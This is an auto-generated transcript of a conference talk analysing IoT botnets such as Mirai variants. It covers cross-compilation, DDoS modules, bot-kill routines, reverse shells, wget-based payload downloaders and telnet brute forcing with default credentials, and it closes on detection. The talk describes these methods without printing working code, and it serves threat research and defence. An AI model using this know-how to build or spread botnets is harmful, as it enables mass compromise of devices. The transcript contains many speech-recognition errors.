 Hello. Hello. Hi. Good afternoon. I am happy to introduce Adi Sud who's going to be speaking on IOT botnets, the crux of Internet of Things chaos. Please give a warm tour con. Welcome to Adi. First of all welcome everyone and thanks for taking time to attend this talk. I think for the next 40 to 45 minutes hopefully we're going to have a good topic in our hand to discuss and let's get it started. So today we're going to talk about in the context of IOT botnets and we're going to delve into a couple of the botnets that we have analyzed earlier, techniques, tactics, exploration mechanisms and then we have a few videos down the lane trying to give you a feel that what you're talking about is really happening. So a little background on mine. Just try to get you to understand what I belong, what I do as a part of my research. So I drafted a book called A Stardust Cyber Tech. It's got published in Chinese as well but it's just like you know idealistic approach of you know how to go after analyze the cyber attacks and everything. So I'm going to lay a little disclaimer and the idea behind this like all the research that we're going to talk and this or we're going to present during the course of this timeline is nothing relates to the unemployed and the reason for that is because this is a kind of work that is being done in your free time as a motivation to share intelligence with the security research community and stuff like that so don't want to get it associated with the employers. So let's get into it. So this is a realistic picture of our E world these days. So what that means is like you know more of the these end devices are interconnected in nature and we'll take a deep dive into later on as well. The idea behind is that you know data movement is happening at a rapid pace. The devices that had increased significantly exponential data processing storage movement is exponential these days and the reason behind that is that with the revolution call of a mobile revolution in last couple of years you know more and more devices you know exist and they are interconnected while internet different protocols Bluetooth and all that there's an interconnectivity somewhere. That means that you know attack surface is getting enlarged and that is a more important part where the adversaries or nefarious actors are going after and only a little bit this research layout here which actually gives you a glimpse how it looks like. So a couple of years back we're talking about in 2000 and all that you know we just talk about like 0.5 billion of devices right now within the last 10 or 20 years we are talking about close to 50 billion which is going to be by 2020. So you can expect that how much or how much the number has increased tremendously which means that these devices are interconnected so as the attack surface is increased and for people like you know adversaries who are sitting on the internet believe in just spawning the systems and all that it is a kind of launchpad that you want to go after right. More devices easy to form botnets easy to go after the last section of the people on the internet and then perform you know sort of the various operations but that actually is a picture that's where we're going to draft you know when we try to talk about threat models and all that we want to see that with the passage of time what has been changed what has been increased and moving forward so let's a little bit talk about internet of things right in a different terminology sometimes we call this internet of things some people call it IT plus OT defending on the things I think but there is not enough clarity on that part like it's just a genetic outline there internet of things everything is comprised into it because these things have interface that are connected on the internet and they are communicating between each other but again we live in this world and all of that and just a few minutes later we're going to discuss about a taxonomy so that we can dissect it accordingly because we need to go after architecture we need to go after either device type or we need to go after exploitation scenarios so let's get started so this is a couple of snapshots I took it from the media outlets to give you the reality of the IoT space right security is nothing is not new but the question is are we really doing it that's the question that is in front of us so you look at couple of these news articles they talk about different IoT botnets that came to exist you know these was a Mirai one there was a first one the major one but then there is a Reaper IoT bot you know Jynx bot and all that what it interprets is threats are real you know attackers are really going after these devices right whether it's routers or switches whether it's the kind of you know audio video conferencing systems all of those kind of any smart device is a refrigerator you know it's like you know other systems that are connected on the internet that is a potential target for the you know attackers to go after but the threats are real so before moving further I think it's really important to understand the taxonomy here and why it is important because the way malicious code is written they have to come up after certain kind of stringences which mean that they want to drive a code which work on all sort of platforms because when they run or when they conduct broad base attack the challenge there is they really want to go after a scenario where they just you know distribute the code let it run and there should not be any kind of constraints by going after different device types and all that so looking into this type you know you can build like different kind of taxonomy either it can be a based on device type you can be having a code drafted based on architecture or different characteristics and functionality right you know you compromise certain set of devices what you are going to use for those devices for network communication and sort of things like that but what we have seen recently apart most of the malware authors they are really going to go after architecture specific code rather than some sort of device type because what they're doing is like they want to really go after underlying a barrier from where whether it's a NICS x86 platform or any kind of platform and that makes them easier to draft a code and written on a continuously period of time if they go after standard device type okay this is only going to go after like standard kind of Cisco switches or I kind of white outers and all that those kind of attacks also persist but when they they nearly need to go after millions of devices they have to make a code which is kind of not device dependent like device type dependent but more or more on the functionality type or you know architecture type so let's just go through a little bit of the IOT botnet attack model the very simple thing is that okay distribute the code when I say about in earlier taxonomy we discussed about you know they're not going to have the device type but most of like architecture type so you can see that they have switches they can be having a video cameras stuff like that a different set of routers the caution is that distribute the code get this system compromised build a botnet and then start launching the attacks they want to do one of the easiest interpretation of the way IOT botnets are built is like you know the compromised devices are used for triggering chain attacks as well what I mean by that is that you know once you have a set of hundred or 200 kind of compromised devices they can launch an attack and try to build or formulate more bots into it because by launching telnet scans stuff like that and we're gonna show it in a demo down the lane as well but considering like this time any threat modeling anyone who wants to do in the field of security I think taxonomy is the most important part to go after because that actually gives you the idea how you're really going to dissect a one specific space in the security so we talk about IOT taxonomy we have a little bit you know gone through the IOT botnet attack model and all that let's just take a quick look onto how compromised IOT devices are being used of course building botnets launching distributed denial of service attacks we've been talking about you know bitcoin mining these days as well they are used for mining as well one of the interesting scenario where they build a stealthy attack flow is to you transform your routers transform your IOT devices into a stealthy proxy which means that okay they have socks they can set up a reverse proxy once you go through it you can get it done and then there's of course mining cryptocurrency and several other kind of you know nefarious operations that they love to perform because devices don't belong to them they have the power they have everything up they want to perform certain activities on the internet that result in financial gains or maybe for fun purposes but that is the idea of you know how the taxonomy IOT botnet attack model and how it looks like to be a compromised IOT devices now before moving further you know the way we have drafted going on after this talk is you know based on reverse engineering that we performed you know analyze the code samples and stuff like that we have picked up the code samples where that particular technique is implemented and we're just going to discuss that technique looking at the code and some of stuff like that the idea behind this layout is because we want to see hey we have analyzed the real set of code the techniques that we're going to discuss is really exist in the wild so let's take a look at it the first one is the that so we're going to connect the dots as well what we discussed earlier so in the IOT taxonomy botnet taxonomy we talk about okay they want to go after a formulate a code which is basically architecture specific which means that they have to do the cross-platform compilation without that it's really hard because you can have a code on x86 but it's not going to run might be on the MIPS architecture so they need some kind of you know harness the power of you know open source projects you know build it and then do the cross-platform compilation and couple of the Mirai variants we're going to talk about a little later as well so you can look at this one code snippets what they're trying to do is like they're going to different architectures and stuff like that and they are building the bindries using that whether it's a arm whether it's x86 MIPS spark power pc whatever it is right and then they have a separate code how they're going to fetch the payloads and bins and all that but cross-platform compilation compilation is a very important aspect for you know malware authors these days let's take a look further in the different functionality we call as like you know distributed denial of service functions of course once you build a botnet you really want to launch some set of attacks right because these are bot formulating a botnet of course distributed denial of service attacks going to be there and when we analyze there can be multiple though d-dot stack can be at a layer three or four which is tcp udp or ip layer and then they can be at the tcp layer seven which is actually tp layer so they can go after like you know some flooding different kind of set but they have this built-in functionality and this code actually tells that how they actually fork the process and then they can have it in a chain reaction trigger you know give the guidance to the different bots there and trigger the attack on a you know dedicated target but this is there you know they they are actually going after this kind of functionality d-dot this is not nothing new but the important part is that it's still persist and that's why whatever the new bots net that are being formed they still have this functionality taking a little deeper look into kind of different kind of denial of service attack variance you know there can be tcp attack udp you know that's a talk about either it can be at the layer three or four or can be at the layer seven of the tcp ip model but it works pretty well right you know basically attackers they just simply compromise the system and they're just going to go after because they can harness the power of that system and do whatever they want to do on the internet but this is like this is kind of like a de facto standard in most of the bot nets whether it belongs to iot or it belongs to any kind of different sphere now let's go further and talk about bot kill what i mean what this technique is all about you know we always talk about you know fights going on and all that but you know there are bot wars also exist in the space where different adversaries form different bot nets right and they want to make sure that their control is much more than the other person which means that they have to draft a code in such a way let's say they install it on a one of the compromise system they have to actually scan through the listed processes or some other artifacts on the system to make sure that this particular compromise devices doesn't belong to any other bot net if it does just go ahead trigger the commands kill it make it yours which means that these guys are performing wars as well right and this technique actually we use is doing so they are actually scanning some of the you know binary checks and all that and then once they found that okay this compromise device doesn't belong to me but i found an artifacts that is from different bot net kill those things make you know either reboot or from other set of functionalities to control that compromised system and make it a part of your own bot net so bot kill is in a very important feature even like you know the way malicious code is designed in the underground community another interesting technique they actually used to go after is a kill all functionality right sometimes okay they are going after you know they are scanning the processes looking into different indicators in the system but then they found that there is no way to actually kill that infection so what they can also do is like to just simply go ahead kill the standard processes reboot the system and try to see if they can you know other other bot that is sitting somewhere can re scan it get it back into that system and then make it a part of it but again this is a kind of very interesting technique as well just go ahead and kill everything up get a complete control and then from there onwards just roll the infections in different way but that's the way it is being done but these are the kind of standard functionalities that these bots and inherent malicious code has built in of course moving forward reversal very much important because some sometimes what happened you know we have a network parameter devices you know lined up you know there's ingress e-glass filtering is going on ports might get closed and all that so attackers or adversaries they don't lose the control right so what they come up with a different technique being you know this is also a technique that is being opted by different bot nets as well it's like just like implement a reverse shell right either socks proxy or some other kind of thing what it means is it actually helps them to bypass the scenario because the connection is initiated by a reverse shell rather than a direct connection from external to internal which is you know with the firewalls and other network parameter devices is not possible but this code actually states that you know some of the botnests you know basically iot bot they also come up with this kind of functionality you know trigger a reverse shell so that the attackers still have a control over that and whatever the updates they want to perform and things like that this can go ahead and do it now now we try to look into a little bit of different you know functionalities from the perspective of how the you know when they are writing this malicious code and all that you know you sometimes people there is no fun of reinventing the wheel right and that's why from this part of analogy it comes up like you know adversaries they actually draft a code and actually harness the power of open source packages as well maybe we have seen like they are directly picking that you know robot package directly from the github embedded run the scripts and perform the function functionality so what we have seen earlier or even it right now couple of these standard packages that are open source one with the you know smaller size compressed ones are being used heavily busy box heavily used because it's gonna give you the portable binary you know power where you can actually simply call busy box and then you know run different set of commands but it's being heavily used so busy box package open source one you know you get the compiled binary call it call the functions triggered in the firmware and then actually run different things another one interesting software package is a drop beer SSH right it's a very you know custom very compact you know SSH client server binary right and again the idea again this part is that somewhere some part of time where they want to open a SSS port or some kind of those activity basically they have to perform a remote administration at the end of the day with that they really need some kind of you know remote access protocol to be in place either it can be talent or they really want to say that I need SSH access into that so they really harness the power of this package as well so we'll take a look in down the lane in our video demonstration but these things these packages are really really important from their point of view because just call them directly enhance the functionality of the bot and perform whatever the operations they want to in an unauthorized fashion another interesting scenario so we're going to connect the dot back to the our IoT botnet exonomy where we talk about okay whenever they want to draft a code they actually want to go after architecture specific or for which they have to do the cross platform compilation right but how they can do it still the answer is the open source packages that are available nonetheless these packages are not bad they are you know designed for some specific set of functionalities but again is the you know is the way that our cyber world works some of the good things can be abused in a different way to perform you know unwanted operations so with the original Linux and all that the way this is being designed you can still compile the binary in a cross platform way and then just call the binary you know call the functions compile it and then you have the binary available you can run it on any architecture it will pick up the artifacts from that system and it won't stop and it will install that's way how the malicious code is being done because sometimes the way botnets are performed they might not going to go after targeted attacks like when we talk about targeted attacks earlier we going after you know people going after specific organization or some kind of a different set of people right but when the broad base attacks are there you know they want to go after thousands of routers you know millions of IoT devices this is one I wanted on the blind right whatever comes in forms the botnet go after and do the you know unauthorized operations but three packages apart from standard Linux utilities like WGAT girl and all that you know these three packages drop beer SSH client busybox and the aboriginal Linux one heavily used these days and if you even search you know surf the internet within a last week and all that try to look into the news in the IoT space all people are calling about that and then further right of course we know malicious code is written in such a way you know people want to have some kind of obvioscation on an encryption in place right so if you perform reverse engineering it's just a bit hard to you know dissect the code maybe it's just not in a kind of advanced level of encryption that these malware authors deploy in the malicious code but again at the end of the way there's some kind of things they still deploy with respect to obvioscation so while we're analyzing the code and all that after pen testing certain servers where we are able to get that code and you can clearly see that this code actually states like they are using the you know ZOR obvioscation and all that might not be that advanced but still it served the purpose to some extent but they definitely deployed data encryption and obvioscation strategies as well now moving forward is like a device architecture detection we talk about okay we compile the code in a cross sorry cross platform way but before that when this like ab original was there and they found out that hey we can use this package to do this kind of functionality earlier they still have some kind of embedded code in place which means that before the standard code the malicious code the payload actually going to run on the system they kind of want to detect the architecture again the idea is that they don't want to actually get detected and things like that so if x86 pick up the x86 call that code or use the wget to fetch on the x86 code download it run it and get it infected and things like that but of course with the passage of time you know things are getting enhanced more and more new techniques are coming up but this was a part of policy as well the way they designed the malicious code earlier just try to give you a quick feel of it after analyzing a couple of this IoT boards and all that you know embedded strings so this is a couple of standard telnet embedded username and passwords these guys love to go after you know telnet telnet standard devices they pick it from like a default passwords and all that build up the strings it can be either embedded in the binder itself or it can be a separate file which they call and then you know trigger things but again at the end of the day the important part in this context is that you know look at the way IoT boards are formed the malicious binary is so much into it right different techniques we talk about killbot killbot we talk about you know they have a device architecture detection code you know DDoS code and things like that again then it's because they have to do the scanning they have to build a bigger bot nets so they actually have to go after other bots basically other systems on the internet so that it can be a part of the primary bot so now let's take a look at it what I was talking about here like how they're gonna fetch the bindries and all that so if you look at this particular code right it's basically standard batch scripts that are being placed on that compromise devices allow it to run they can simply go have go after the you know remote domain which is being controlled by the attacker and what I mean by that is like you know attacker has a full control they can deploy any code change or re-iterate the code as per his convenience so you just run that batch script on that system it's gonna fetch the payloads from the remote location and you can see this can it's gonna change the mode make it executable and tied back to the architecture whether it's some apps architecture and all that and then clean it right away as well because they don't want to have any kind of leftover fodder there once they actually execute the code and this was the like the thing they were we found out you know on the internet and all that or even you try to test certain domains and all that you get some access to certain code as well similarly on this benchmark if you look at the another code a little bit differently but you can look at how the how they actually constructed the resource the payload right the payload is basically a simple iteration of the three alphabet characters you bought and all that so we talk about we're gonna look at it down the lane as well so we analyze mirai board but there was a cubot as well with different functionalities but you can clearly see how they're actually you know structuring the payloads the naming convention and all that you know make it executable then go after delete it right away so that there will be no traces on the system an idea is that you can clearly see the way they were actually going after they want the infections but they don't want to have any traces on the system as well you know if somebody comes in and find that if we connect the dot these kind of things also help the advanced attackers to actually beat the killbot feature as well because sometimes they want to look at certain you know standard indicators which might not be there because after the execution they have removed it so it's a kind of arms race which we always used to call right you know somebody has to get it done somebody's behind but it's an arms race at the end of the day let's take a look at all thing so we discussed about kill all functionality earlier but they can also implement that functionality in the form of scripts as well so you can clearly see it's a simple bash script you know performing such kind of you know process operation maybe scanning through the process list performing some kind of operations to make sure that no traces are there if they don't find any traces go after and kill it i want a clean system i will reboot it and because i have a multiple bots running it differently and this was a part of earlier botnet i can rescan it reboot it and then i can get it access to that device again so these kind of different functionalities keep on persisting and that's the way they are able to build botnets and they are still able to go after building botnets every day despite we think we have done enough in security but exactly that's not the case you know so again another variant of the same kill all functionality you can clearly see how the bash script is being called and all that and they are actually on the left side going after sent os ss demon and then performing some logic to you know to make sure the infections are right so the whole purpose of showing you the code during the course of this presentation is to make sure that we are just not only talking about the techniques but exactly we have analyzed that in detail and there are there are standard evidences available which actually prove that these techniques are real and they are exist in the real world so let's take a little bit deep dive into the next part so we're gonna you know refresh what we have gone through in the last couple of slides and then we'll delve a little bit into the real world examples try to show you that you know the stuff exists and how bad it is even from the incident response point of view whether you're doing security assessment of certain devices and all that how these attacks look like differently when you're analyzing at the network level or you're analyzing on the low level debug code and all that so let's start with you know we there are certain variants came to exist like you know a few years back but mirai was the most important one which actually sets the baseline to build more iot bots somehow the source code got leaked earlier and the people picking that code again if we connect the door nobody wants to reinvent the wheel just transform it in into add more code add and write you know kind of deploy more c like c code python code and all that shell script just enhance it and just go ahead and then deploy it and we'll take a look into that as well so just to reiterate what we have gone through want to go through the execution flow model here you know the idea is to compromise the device go ahead fetch the malicious payload of course obtain system privileges by exploiting a vulnerability performing some privilege escalation on the system of course launch attacks i mean you got the system got compromised they have to launch attacks and expand the botnet and at the end of the day once you expand your botnet whether you want to use it for financial gains whether you want to use it for some different purposes like in the underground cyber community they can rent this botnet out to perform you know different set of attacks you know trigger some phishing different kind of things they can perform and this is like renting a botnet as well but we got a we got a like a kind of bit of easy feel that how the execution flow model works but the next that we want to go after is some of the real world examples there will be some screenshots for these screenshots are taken when we perform the security assessments and how we get in access to those domains we download the malware did some different analysis try to get a feel of it so different techniques were opted because if you really want to go after analyzing a malware it just not only a one technique that you have to go after like whether it's a static analysis dynamic analysis or you have to perform some kind of you know security assessment of the remote domains of course intelligence gathering you have to perform but it's a it I always call this a some multi-threading approach right you have to have different analytical threats that has to be there to come up with the standard strong scenario so let's take a look the first one so if you look at this uh you know slide here right so you can see that we're talking about here the like the variant called as a bleed street of course different architectures there's an arm one arm five you know MIPS x86 and all that the question is how you get used to it you know how you actually get an access to this particular uh domains and many with different ways you can go after you know some people these days you know I mean there was a technique known earlier they deploy honeypots as well but they fetching but there are other ways you can go after as you know find these things out you know when you um pen test you know remote CNC servers so you've got some indicators from there you try to connect the dots go after with different remote domains you know get idea of it but apart from that the question is that so you got then access to the domain which is hosting providing a directory listing of this different boundaries and if you can see that you know once you run the file command and things like that you get a feel of it which architecture it belongs to and it's all unexecutable because I really don't want to go too much into reverse engineering during the course of this talk so we did like basic checks and all that to actually give you a feel that you know those are the infected ones so it so if you look at the strength check right the one that I have not shown here is uh I have basically highlighted in red it's just like a hard-coded IP address in that arm bind really so when that bind is going to execute in the compromise system is going to go to the attacker control domain fetch it from here and then get all the malicious packages payloads dump on it install it and run on the compromise device so while you perform an analysis you get the access to that you know at least you come to know about that IP address then you can start your assessment on that IP address you know from different sphere just enhancing the same scenario with the latest example the gefit uh mirai variant it is actually an attack that is going on right now somehow I was doing some research last night so we came across this thing I don't want to show it in real time but it is this this attack is right now going in going on so you can see that once you get an access to it again the directory listing but there are different bindries and you can clearly see there is one call as apache 2 as well which has gained a binary but then you can see there's an infected dot txt file all infections and sort of things like that which actually is a contains a record of compromised iot devices or the like iot devices they are going to scan so you dump apache 2 and then you know you perform analysis a little bit on strings and try to get an initial feel kind of stuff like that and then you do a little bit check on the background with some intelligence feed you get a feel of that okay this is like you know gefit um mirai variant and it has an embedded that shell script and i want to show you that as a part of the demonstration so we're going to look at a very quick demo it's a very basic check uh we didn't want to talk about you know how we get the bindries and stuff like that we had the bindries we want to show that how the things that look like when those are embedded in and just let's let's take a look at the video so we dumped the bindries from there the three bindries we were talking about just try to run the file check is going to give you how it's being compiled and all that but i was like we damn interested in apache 2 because when the expedient attack happened earlier um it was a struts vulnerability so we would just want to check if they are building this apache binary is it just a legitimate struts exploit or is just like kind of they're using this terminology to bypass certain scenarios so you just simply run the strings try to get a little bit indicators so you see that embedded c code is there we were not interested in too much into it what we are looking forward is the embedded bash script into it okay we've got access there's a firmware one keep on scrolling so there is started giving you some good uh you know strings here which we're going to look at you know ping pong my ip scanner stuff like that and now there is starts up you can see that couple the embedded username passwords here and then the shell so somehow i have not actually i have actually led the ip address to stay there if you want to perform some stuff down the lane you can go ahead and do it as well but do you want to delve into the more reverse engineering where you load the stuff into idapro and do the static code but it gives you enough to believe that you know this apache 2 binary is a problematic one and how you really need to go to go after and perform next set of analysis so now we're just stacking connecting the dots back again we checking the drop beer binary it is there we checking the blue get it is there and things like that so these are like a quick and dirty analysis uh yeah sometimes you have to go a little bit more deeper into it but at the end of the day once you get these indicators you try to connect them go after the bigger sphere and then go after you know how what a kind of other um uh compromised devices that are somewhere attached to this kind of scenario let's move a little bit uh further so in this particular screenshot it is one of the audio video conferencing devices are like a kind of very big company uh so we were testing certain things we got uh somehow we got an access to their debug interface and things like that but this actually shows that when you have to perform analysis at that level what kind of stuff you have to go through right so you get a lot of these you know memory addresses coming in you know kind of modular calls are being called functions are being you know called and then because anytime in that device a single function is being performed the debug logs are throwing a lot of garbage stuff into it but you have to actually extract the ones that you want in this particular screenshot I have a demo as well to prove this artifact this actually shows that whenever something is happening on that device there is a some wkit calls are being issued the shell scripts are being run and at the back end it's fetching something kind of bad things like a bad payloads and it's getting installed and things like that so you extract somehow you are able to extract the payload you can still run it by third party service try to get a feel of it whether it's a known one or it's the the variant of the already existing one so you get a feel of it like this is still a malicious one the shell scripts the kind of payloads they are fetching are malicious so we found different variants of mirai as well but these variants like we're targeting a very well known audio video conferencing systems let's take a look so if you look at this particular screenshot right we're talking about the anarchy bot here from the top if you look there are like three commands are being actually issued right started from the session is registered and they actually go gonna go after you know default enable system and these are some of the commands they run in a iterative way hierarchical way to get perform some kind of privilege escalation or to get a control of certain set of binaries by calling these commands and then they actually go into shell mode with the SS command and then their inherent code starts triggering up the scenario so if you look at the bin busybox one again the open source package it is calling the anarchy payload here and they're going to perform some different kind of things and if we really look back with that topic we discussed no need to reinvent the wheel so they still use the mirai code but the variant is a little bit different the standards are the same but they're performing different set of functionalities let's take a look at the another variant this one is a cult bot right similar scenario similar things found on the some another deployment of the the compromised audio video conferencing system there was a you know available on the internet in this particular scenario variant they treated it as a cult one but whole scenario going into the mode enabling system shell is the same as mirai let's go into another variant the sorrow bot again the scenario is the same but the payload is a little bit different so they might want to perform some kind of different activities which are not in line with the mirai one and we just came to know like you know the person who drafted this or I think it's in the media I think the guy has been you know somewhere it's been prosecuted one or the other way by the legal authorities been custody but the caution here is that source code is there I don't need to reinvent it and they are not doing it exactly now we are extending it to expect to the next level and what are we going to talk about right now is a brute force scenario so there was a compromise device it triggered a different kind of variants now what exactly it is supposed to do it is supposed to launch brute force attacks and if you can clearly see again there's a lot of debug logs how will you figure it out when you're doing research because sometimes you are not on the same network sometimes you might be on the same network but when you access to these kind of debug interfaces and all that how you'll figure it out so you have to find indicators you have to look for the artifacts and when we're doing the research looking into it and you can clearly see which module which is called as an AVC is a video controller audio video thingy and they have certain kind of functions embedded in and they have like a telnet function in itself as well they call that function once I've actually so if you look at the top there is a telnet underscore client they register the telnet session and they start reiterating with the embedded username or password and start initiating telnet connections or brute force attack or password cracking attempt from that compromise system and it will keep on going on for a long period of time and but when you are analyzing as a part of researcher you are analyzing into it trying to figure it out how will you come to know that these things are there again it's a multi-threading it like we used to have multi-threading environment but even with the analysis you have to look into bigger sphere you just cannot beat the bush by just few artifacts but this is a reality eventually when we do a little background research one is done it was using the root and the anchor password right you find that the anchor password was like some kind of use for some unix system so it means they they know they build this this list by looking at some of the default system that are available on the internet they're going to go after unix system and all that so you keep on connecting the things analysis will start giving you different scenarios and then from there onwards you can you know launch your analysis to the next level it doesn't make sense if we don't see the video in real time i won't say real time but i have embedded video in try to give you a feel how it looks like when you're performing analysis and let's just take a look at it so i have to you know i just remove certain artifacts from here but it actually gives you a good view it's a three minutes video but this is how it looks like when you get an access to the interface how fast the attack is moving and things like that so there's a lot of other things are happening in that compromise device but you can clearly see those basically indicators start popping up right this one is showing some kind of meori variant okay that's fine we're seeing seeing that okay the compromise device is performing certain kind of activity without any interaction let's just take a skip on going on now if you look at right now i will highlight it in a few seconds here so there so it creates that telnet session because the talent is redirecting to the pseudo terminal it created a telnet session and it start launching the brute force attack or password cracking attempts it is going from the real time system we are just sitting back we are analyzing the system looking into it and you can clearly see is keep on triggering the attack again there is a sport login and all that and the telnet sessions are keep on getting created next set of username password is being tried it sleeps for a few minutes triggered it again and things like that but this is all a kind of compromise audio video conferencing system no interaction nothing is just going on the fly as soon as it connects back to the internet and it is going after it halted because the sleep function triggered it now it's picking up again so you can imagine this is just a one compromise system you can imagine if you have a thousand of these compromise systems that they're going after the similar scenario that's how they actually build bigger botnets because it's just going in a distributed fashion they have the ip list where they want to create a talent they want to check the you know baseline there whether they have weak security configuration or not somehow it started showing the traces on mirai as well yeah so this is the attack they want to actually show in real time that actually these kind of things exist but when you have to perform analysis you have to look into various scenarios so so we we started with the you know why iot how what iot you know how it looks like we went through the you know taxonomy the botnet execution so model we went through different techniques by looking at the source code destroyers then we look into the real world examples gone through two one of the basic video demonstration of apache two how vulnerable that binary was looked into one of the audio video conferencing system but then when you still have to perform empirical analysis you still have to go and pick a few samples all the techniques that we have gone through we have to map those techniques back to the different iot botnets because we want to get a bigger picture a bigger matrix try to see how the evolve the bots are evolving with the passage of time and we did conduct a one study which we call as empirical analysis we try to pick up the you know the bots that were like the first ones that came to exist that actually got a bigger attention we went to like hajime persirai amnesia bricker one mirai linux irc idra and all that but again the question the part that we want to obtain from this research is we have a techniques we want to look into cnc architecture communication protocol you know infection strategies persistence denial of service capabilities different kind of features and how it maps back to the different set of bots right then it actually gives you a view and when you're building algorithms for detecting these kind of scenarios you need this kind of intelligence it starts from your simple analysis pen testing certain domain get some artifacts testing some real world scenarios and then actually building this kind of research layout at the end of that day to get a solid intelligence that can be feed it back to your automated detection and prevention solutions it makes sense because let's say if you want to write a signature it's just an old technique of drafting signature but you still know you know what this particular one of the variant okay that technique is not going to be good at the network level sort of things like that and some of the things which other researchers have worked on simple iot botnet signatures you can clearly see they pick it from it's just as some of the yara rules and all that you know get the strengths put it in you know get through the binary check whether this not there or not but the question again that we all as a researchers we need to ask is you know keep on sharing with the community at the end of the day but then on the contrary it's just not only a one thing that you have to go after it's just not only that okay you find a one compromise system you perform the analysis you share with the community we need a bigger picture as well we need to build security solutions so the intelligence need to be feed it in that way we talk about data mining machine learning natural language processing artificial intelligence but again at the end of the day you have to mine data and for data you have to have sampling performed on a bigger sets to make sure that what are you being concluding out of it is good so that being said we started with the internet of things we came back to the same scenario here the one thing that i want to highlight with the internet of things scenario is that i think maybe we have many companies out there they talk about iot security and all that i think the bigger part that we are missing is the taxonomy right when we talk about iot is it it plus ot is it information technology or operational technology is it internet of things what what is all about so we have to take it out of the marketing scenarios then okay i know in cyber security world after two three years you need to come with different marketing terminology but we need a very dedicated set of internet of things taxonomy you're categorizing into enterprise iot you're categorizing into and and user scenario where they use the iot devices so some of the things are there because if you really want to nurture and build strong security solution taxonomy is very much desired you cannot just put up a one standard solution and write it run for things where we come out okay there is a router it's an iot all you're running is a white listing on the top of it so that's how you can't defeat the way botanists are being deployed and designed so that being said we still have three minutes questions so again it depends on the so i'm gonna repeat your question again so that everybody knows about it so i think he's asking have we seen any kind of advanced botnets where they actually go after when we talk about payloads they go after root kits deployed in which are undetected in nature right so i think i'll start it in the context of when we perform experimental analysis right so idea is that you know we look at the volumes of attacks right we can still say that in this world that anti-virus is dead but still at the end of the day malware keep on coming and things like that the traces that we have seen looking at the architecture because a nix-based architecture and all that most of the that thing that is little bit derived towards the volume level right so the volume that we are seeing with that kind of mirai variant and all that is the techniques but on the contrary the question is how many scary solutions are being deployed to detect the risk in these kind of devices like routers who check you know you have exposed and things like that and at the end of the day right i'm not and like totally negating the fact that there will not be those kind of root kits but the volume is not that high so when we derive analysis build solutions will go after where you can detect something on the fly rather than just waiting for those scenarios and linux root kits we have like you know tools like earlier rootkit hunter and all that you know sac hits and all that behavior file integrity monitoring and all that but again at the end of the day it will eventually come and the volume will increase as soon as the advanced security solutions come to play because if you don't have advanced security solutions they are getting the work done with the same period of like same set of code and why they really need to go after building advanced rootkit code and all that but there will be some samples down there which are undetected will be running in the wild that's what we really need to find it out hope i'll answer the question not exactly so if i'm getting your question right is like if we have like additional set of packages installed like gcc and all that which might make it difficult for the malware authors to deploy the code yeah yeah so no exactly these are the couple of open source packages that we discussed here but eventually the one thing that we have analyzed during the course of this research is that they are already also utilizing those bindries as well for their own purposes right that's why if you look at the some of the pre-compiled bindries and all that it's not necessary they're always using wget or ftp and tftp and all that they are using like these kind of standard curl bindries as well because the question there is they want that thing package to be available on the compromise device and you can still use to fetch the payloads on the fly so those are the things that are there i don't see the question again boils down to the one part all these devices how many security solutions are placed to prevent infections and audio video conferencing systems that's the question that really are these kind of audio devices and not enough all they're relying is on a signature based white listing and all that you know if it hits on a malicious ip stop it but i think this this problem is going way beyond that right now i mean i'll be around if you have any more questions thanks everyone for attending this talk i appreciate that